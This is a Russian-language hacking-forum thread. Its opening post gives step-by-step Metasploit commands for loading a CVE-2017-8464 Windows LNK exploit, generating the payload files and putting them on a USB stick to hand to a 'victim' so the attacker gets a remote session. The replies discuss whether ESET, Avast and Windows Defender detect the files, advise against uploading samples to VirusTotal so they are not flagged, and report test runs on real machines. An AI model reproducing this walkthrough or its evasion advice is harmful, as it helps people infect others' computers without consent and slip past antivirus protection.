Всем привет, смотрю пошла у нас движуха с USB девайсами для заражения жертв, ну думаю "че я лысый?) в трэнде нужно быть!" Правильно?_) Вот и представлю Вашему вниманию очередной способ заражения от меня)
Нам потребуется 5 минут USB - накопитель, Kali-linux и так едем... сюда !

https://forum.antichat.xyz/attachments/4783987/img_673f410a91.png



уязвимые ОС-и

https://forum.antichat.xyz/attachments/4783987/img_71b9d4fd69.png



переименовываем и телепортируем в метасплойт:

Код:



mv 42382 CVE_2017_8464_LNK_Rce.rb


Код:



mv CVE_2017_8464_LNK_Rce.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/


запускаем MSF и обновляемся командой: reload_all и...

https://forum.antichat.xyz/attachments/4783987/img_b3608c9422.png

exploit -j

далее, настраиваем под себя уязвимость:

Код:



use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce


https://forum.antichat.xyz/attachments/4783987/img_a245958fde.png



можете еще и порт настроить под себя, жмем: exploit

MSF сгенерит файлы, откроем скрытую папку где они лежат) командой: xdg-open /root/.msf4/local/

перенесем их в нашу злую USB-flash-ку )) и подсунем флэшку "жертве прогресса"!)) Как только "жертва" откроет у себя на компе для просмотра содержимого, у Вас появится заветная сессия!))

Удачи!

MrsRobot сказал(а):

спасибо! а как реагируют антивирусники, не тестил? есет будет ругаться?


не нетестил с антиками) если есть возможность? отпиши плиз..

MrsRobot сказал(а):

где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)


У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)

MrsRobot сказал(а):

есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине

ок..сама потестирую будет время
у нас все в облаках


www.antivirusware.com/
http://www.threatexpert.com
https://www.zonealarm.com
http://www.virscan.org
https://www.symantec.com
https://www.comodo.com

MrsRobot сказал(а):

есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине

ок..сама потестирую будет время
у нас все в облаках


есет смарт секьюрити (лицензия) обнаруживает трояна

Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")

Ondrik8 сказал(а):

Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")


Хороший фильм

Код:



msf > -j
[-] Unknown command: -j.
msf >
msf > use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
[-] Failed to load module: exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
msf >

Заработало!

Как держать это всё в голове и понять какую из 1983746 уязвимостей применить в данный конкретный момент?

adm2 сказал(а):

Как держать это всё в голове и понять какую из 1983746 уязвимостей применить в данный конкретный момент?


а не надо ничего в голове держать) для этого есть сканеры)

Avast палит и жрет файлы.

на вин 7 x64 при приподключении флешки крашится проводник... консоль пипишет сессия начата, но шелл не дает, через некоторе время сессия умирает. На вин 10 х64 файлы сожрал "Защитник виндоус", после его отключения система не сбоила , но сессию я не получил. Тестил на реальных тачках не на виртуальных. Да и Аваст тоже файлы сожрал(((

может нужно с руби дак запускать, а не с обычной флэшки, тогда я думаю получиться.

Насколько я понимаю, если использовать meterpreter - любой антивирус уже его задетектит. Какой смысл от экспериментов?